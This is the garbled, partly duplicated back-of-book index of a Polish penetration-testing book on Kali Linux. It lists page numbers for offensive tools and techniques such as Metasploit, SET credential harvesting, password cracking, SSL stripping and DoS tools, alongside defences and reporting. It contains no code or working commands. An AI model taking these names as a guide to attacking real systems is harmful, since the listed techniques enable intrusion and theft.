apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
